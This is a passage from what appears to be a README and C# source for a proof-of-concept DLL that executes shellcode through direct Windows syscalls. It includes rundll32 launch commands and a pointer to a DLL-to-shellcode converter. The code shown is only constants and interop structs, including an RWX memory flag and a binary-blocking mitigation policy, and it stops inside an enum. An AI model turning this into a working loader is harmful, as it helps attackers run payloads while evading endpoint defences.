ExecuteShellcodeWithSyscalls
Execute shellcode with syscalls from C# .dll
ExecuteShellcodeWithSyscalls
Execute shellcode with syscalls from C# .dll
Compile with csc.exe (https://github.com/mobdk/compilecs) and insert the entrypoint exec. At the time of writing this supports Windows 10 1803/17134, 1809/17763, 1903/18362 and 1909/18363; servers can be added.
To find syscall identifiers, go to https://j00ru.vexillium.org/syscalls/nt/64/
This PoC executes calc.exe. I recommend https://github.com/monoxgas/sRDI/blob/master/PowerShell/ConvertTo-Shellcode.ps1 for converting a C-coded .dll into shellcode; it works with both 32- and 64-bit.
Execution example:
Ordinal number: rundll32 syscalls.dll,#1
Entrypoint exec: rundll32 syscalls.dll,exec
syscalls.cs:
using System;
using System.Security;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Runtime.ConstrainedExecution;
using System.Management;
using System.Security.Principal;
using System.Collections.Generic;
using System.ComponentModel;
using System.Security.Permissions;
using Microsoft.Win32.SafeHandles;
using System.Linq;
using System.Reflection;
using System.Security.AccessControl;
using System.Text;
using System.Threading;
public class Code
{
// Win32 / NT constant table used by the native calls in this class.
// NOTE(review): the access-right masks below are declared as a mix of int, long and uint;
// a long constant will not implicitly convert to a uint P/Invoke parameter, so any call site
// that consumes them must cast explicitly -- verify against the signatures that use them.
// Virtual memory allocation type and protection (MEM_*, PAGE_*).
public const uint MEM_COMMIT = 0x00001000;
public const uint MEM_RESERVE = 0x00002000;
// 0x40 = writable AND executable in one region; RWX allocations are a common hunting indicator.
public const uint PAGE_EXECUTE_READWRITE = 0x40;
// File-specific access rights (FILE_* from winnt.h). Several names share a value on purpose.
public const int FILE_READ_DATA = 0x0001;
public const int FILE_LIST_DIRECTORY = 0x0001;
public const int FILE_WRITE_DATA = 0x0002;
public const int FILE_ADD_FILE = 0x0002;
public const int FILE_APPEND_DATA = 0x0004;
public const int FILE_ADD_SUBDIRECTORY = 0x0004;
public const int FILE_CREATE_PIPE_INSTANCE = 0x0004;
public const int FILE_READ_EA = 0x0008;
public const int FILE_WRITE_EA = 0x0010;
public const int FILE_EXECUTE = 0x0020;
public const int FILE_TRAVERSE = 0x0020;
public const int FILE_DELETE_CHILD = 0x0040;
public const int FILE_READ_ATTRIBUTES = 0x0080;
public const int FILE_WRITE_ATTRIBUTES = 0x0100;
// Create disposition / create options for the native file-create path.
public const int FILE_OVERWRITE_IF = 0x00000005;
public const int FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020;
// Standard access rights, declared as long so they OR cleanly with the FILE_* masks above.
public const long READ_CONTROL = 0x00020000;
public const long SYNCHRONIZE = 0x00100000;
public const long STANDARD_RIGHTS_WRITE = READ_CONTROL;
public const long STANDARD_RIGHTS_EXECUTE = READ_CONTROL;
public const long STANDARD_RIGHTS_ALL = 0x001F0000;
public const long SPECIFIC_RIGHTS_ALL = 0x0000FFFF;
// Forward reference to STANDARD_RIGHTS_REQUIRED (declared below) is legal for C# constants.
// Evaluates to 0x1F01FF.
public const long FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF;
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
// Access-token rights (TOKEN_* from winnt.h).
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY = 0x0008;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
// Evaluates to 0xF01FF.
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID);
// Not an SDK name: a local subset of token rights (0x0F) defined by this file.
public const UInt32 TOKEN_ALT = (TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY);
// LUID_AND_ATTRIBUTES attribute bit meaning "privilege enabled".
public const UInt32 SE_PRIVILEGE_ENABLED = 0x2;
// Generic file rights composed from the masks above (long because SYNCHRONIZE is long).
public const long FILE_GENERIC_READ = STANDARD_RIGHTS_READ | FILE_READ_DATA | FILE_READ_ATTRIBUTES | FILE_READ_EA | SYNCHRONIZE;
public const long FILE_GENERIC_WRITE = STANDARD_RIGHTS_WRITE | FILE_WRITE_DATA | FILE_WRITE_ATTRIBUTES | FILE_WRITE_EA | FILE_APPEND_DATA | SYNCHRONIZE;
public const long FILE_GENERIC_EXECUTE = STANDARD_RIGHTS_EXECUTE | FILE_READ_ATTRIBUTES | FILE_EXECUTE | SYNCHRONIZE;
// Share modes.
public const int FILE_SHARE_READ = 0x00000001;
public const int FILE_SHARE_WRITE = 0x00000002;
public const int FILE_SHARE_DELETE = 0x00000004;
// File attribute bits.
public const int FILE_ATTRIBUTE_READONLY = 0x00000001;
public const int FILE_ATTRIBUTE_HIDDEN = 0x00000002;
public const int FILE_ATTRIBUTE_SYSTEM = 0x00000004;
public const int FILE_ATTRIBUTE_DIRECTORY = 0x00000010;
public const int FILE_ATTRIBUTE_ARCHIVE = 0x00000020;
public const int FILE_ATTRIBUTE_DEVICE = 0x00000040;
public const int FILE_ATTRIBUTE_NORMAL = 0x00000080;
public const int FILE_ATTRIBUTE_TEMPORARY = 0x00000100;
public const int FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200;
public const int FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400;
public const int FILE_ATTRIBUTE_COMPRESSED = 0x00000800;
public const int FILE_ATTRIBUTE_OFFLINE = 0x00001000;
public const int FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000;
public const int FILE_ATTRIBUTE_ENCRYPTED = 0x00004000;
// Directory change-notification filters.
public const int FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001;
public const int FILE_NOTIFY_CHANGE_DIR_NAME = 0x00000002;
public const int FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x00000004;
public const int FILE_NOTIFY_CHANGE_SIZE = 0x00000008;
public const int FILE_NOTIFY_CHANGE_LAST_WRITE = 0x00000010;
public const int FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x00000020;
public const int FILE_NOTIFY_CHANGE_CREATION = 0x00000040;
public const int FILE_NOTIFY_CHANGE_SECURITY = 0x00000100;
// Change-notification action codes.
public const int FILE_ACTION_ADDED = 0x00000001;
public const int FILE_ACTION_REMOVED = 0x00000002;
public const int FILE_ACTION_MODIFIED = 0x00000003;
public const int FILE_ACTION_RENAMED_OLD_NAME = 0x00000004;
public const int FILE_ACTION_RENAMED_NEW_NAME = 0x00000005;
// Mailslot sentinels.
public const int MAILSLOT_NO_MESSAGE = -1;
public const int MAILSLOT_WAIT_FOREVER = -1;
// Volume / file-system capability flags.
public const int FILE_CASE_SENSITIVE_SEARCH = 0x00000001;
public const int FILE_CASE_PRESERVED_NAMES = 0x00000002;
public const int FILE_UNICODE_ON_DISK = 0x00000004;
public const int FILE_PERSISTENT_ACLS = 0x00000008;
public const int FILE_FILE_COMPRESSION = 0x00000010;
public const int FILE_VOLUME_QUOTAS = 0x00000020;
public const int FILE_SUPPORTS_SPARSE_FILES = 0x00000040;
public const int FILE_SUPPORTS_REPARSE_POINTS = 0x00000080;
public const int FILE_SUPPORTS_REMOTE_STORAGE = 0x00000100;
public const int FILE_VOLUME_IS_COMPRESSED = 0x00008000;
public const int FILE_SUPPORTS_OBJECT_IDS = 0x00010000;
public const int FILE_SUPPORTS_ENCRYPTION = 0x00020000;
public const int FILE_NAMED_STREAMS = 0x00040000;
public const int FILE_READ_ONLY_VOLUME = 0x00080000;
// CreateFile disposition.
public const int CREATE_ALWAYS = 2;
// NOTE(review): the SDK's GENERIC_ALL is 0x10000000; 0x1FFFFF is the Vista+ PROCESS_ALL_ACCESS
// mask. The name looks misleading -- check how the consumer uses it before renaming.
public const uint GENERIC_ALL = 0x1FFFFF;
// Process-creation mitigation policy attribute and flags. Declared without an access
// modifier, so these three are private to Code, unlike the public constants above.
const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007;
const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000;
const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
/// <summary>
/// Attribute buffer handed to the native thread-creation call.
/// Field names are kept exactly as in the original listing; the listing does not
/// document what each one carries, so no meaning is asserted here.
/// Pack = 4 forces the two IntPtr members onto 4-byte boundaries.
/// NOTE(review): whether that packing matches the native x64 layout cannot be
/// confirmed from this file -- verify against the caller that fills it in.
/// </summary>
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct NtCreateThreadExBuffer
{
    /// Named "Size" by the original author; presumably the buffer length -- confirm.
    public Int32 Size;
    public UInt32 Unknown1;
    public UInt32 Unknown2;
    /// Pointer-sized; lands at offset 12 because of Pack = 4.
    public IntPtr Unknown3;
    public UInt32 Unknown4;
    public UInt32 Unknown5;
    public UInt32 Unknown6;
    /// Pointer-sized; 4-byte aligned like Unknown3.
    public IntPtr Unknown7;
    public UInt32 Unknown8;
}
/// <summary>
/// Managed mirror of the Windows OSVERSIONINFOEXW record: five 32-bit version
/// fields, an inline 128-WCHAR service-pack string, then the service-pack,
/// suite and product-type fields. CharSet.Unicode makes the inline string UTF-16.
/// </summary>
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct OSVERSIONINFOEXW
{
    /// Size of this structure in bytes; by SDK convention the caller fills it before the query -- confirm in the caller.
    public Int32 dwOSVersionInfoSize;
    public Int32 dwMajorVersion;
    public Int32 dwMinorVersion;
    public Int32 dwBuildNumber;
    public Int32 dwPlatformId;
    /// Fixed inline buffer of 128 UTF-16 code units (not a pointer).
    [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
    public string szCSDVersion;
    public ushort wServicePackMajor;
    public ushort wServicePackMinor;
    public ushort wSuiteMask;
    public byte wProductType;
    public byte wReserved;
}
/// <summary>
/// Two-part 64-bit integer laid out as the Windows LARGE_INTEGER union's
/// LowPart/HighPart pair (8 bytes, HighPart at offset 4).
/// NOTE(review): the SDK declares HighPart as a signed LONG; the unsigned
/// declaration here only differs for values with the top bit set.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct LARGE_INTEGER
{
    /// Least-significant 32 bits.
    public uint LowPart;
    /// Most-significant 32 bits.
    public uint HighPart;
}
/// <summary>
/// Managed mirror of the Windows SYSTEM_INFO record. Field order follows the
/// native declaration; the three pointer-sized members make the total size
/// depend on the process bitness.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct SYSTEM_INFO
{
    /// First 32-bit slot (the native definition overlays OEM id / architecture here).
    public UInt32 dwOem;
    public UInt32 dwPageSize;
    public IntPtr lpMinAppAddress;
    public IntPtr lpMaxAppAddress;
    /// Pointer-sized bitmask, hence IntPtr rather than uint.
    public IntPtr dwActiveProcMask;
    public UInt32 dwNumProcs;
    public UInt32 dwProcType;
    public UInt32 dwAllocGranularity;
    public UInt16 wProcLevel;
    public UInt16 wProcRevision;
}
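/// <summary>
/// Process access rights (PROCESS_* bits from winnt.h) as a combinable flag set.
/// A <see cref="None"/> member (0) is added so the enum follows the [Flags]
/// convention and an "empty mask" can be expressed without a cast; every
/// existing member keeps its original value.
/// NOTE(review): All = 0x001F0FFF is the pre-Vista PROCESS_ALL_ACCESS mask;
/// later SDKs define it as 0x1FFFFF -- confirm which value the callers expect.
/// </summary>
[Flags]
public enum ProcessAccessFlags : uint
{
    /// No rights requested.
    None = 0x00000000,
    /// Full access mask (pre-Vista PROCESS_ALL_ACCESS value; see type note).
    All = 0x001F0FFF,
    Terminate = 0x00000001,
    CreateThread = 0x00000002,
    VirtualMemoryOperation = 0x00000008,
    VirtualMemoryRead = 0x00000010,
    VirtualMemoryWrite = 0x00000020,
    DuplicateHandle = 0x00000040,
    CreateProcess = 0x00000080,
    SetQuota = 0x00000100,
    SetInformation = 0x00000200,
    QueryInformation = 0x00000400,
    QueryLimitedInformation = 0x00001000,
    Synchronize = 0x00100000
}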
/// <summary>
/// Managed mirror of the NT OBJECT_ATTRIBUTES record passed to Nt* object calls.
/// NOTE(review): Length and Attributes are ULONG (32-bit) in the native definition.
/// Declaring them as 64-bit keeps the x64 member offsets identical only because the
/// native layout pads each of them to 8 bytes; a 32-bit layout would not match.
/// Confirm against the intended target bitness.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct OBJECT_ATTRIBUTES
{
    /// Size of this structure; widened to 64 bits here (see type note above).
    public UInt64 Length;
    public IntPtr RootDirectory;
    /// Pointer to a UNICODE_STRING in the native API -- not verified from this file.
    public IntPtr ObjectName;
    /// OBJ_* flag bits; widened to 64 bits here (see type note above).
    public UInt64 Attributes;
    public IntPtr SecurityDescriptor;
    public IntPtr SecurityQualityOfService;
}
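/// <summary>
/// Managed mirror of the NT CLIENT_ID record: a process id and a thread id,
/// each carried in a pointer-sized field (HANDLE in the native definition).
/// The explicit Sequential layout is the default for structs and changes nothing
/// at runtime; it is added so this type is declared the same way as the other
/// interop structs in this class.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct CLIENT_ID
{
    /// Process id, pointer-sized.
    public IntPtr UniqueProcess;
    /// Thread id, pointer-sized.
    public IntPtr UniqueThread;
}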
public enum NTSTATUS : uint
{
Success = 0x00000000,
Wait0 = 0x00000000,
Wait1 = 0x00000001,
Wait2 = 0x00000002,
Wait3 = 0x00000003,
Wait63 = 0x0000003f,
Abandoned = 0x00000080,
AbandonedWait0 = 0x00000080,
AbandonedWait1 = 0x00000081,
AbandonedWait2 = 0x00000082,
AbandonedWait3 = 0x00000083,
AbandonedWait63 = 0x
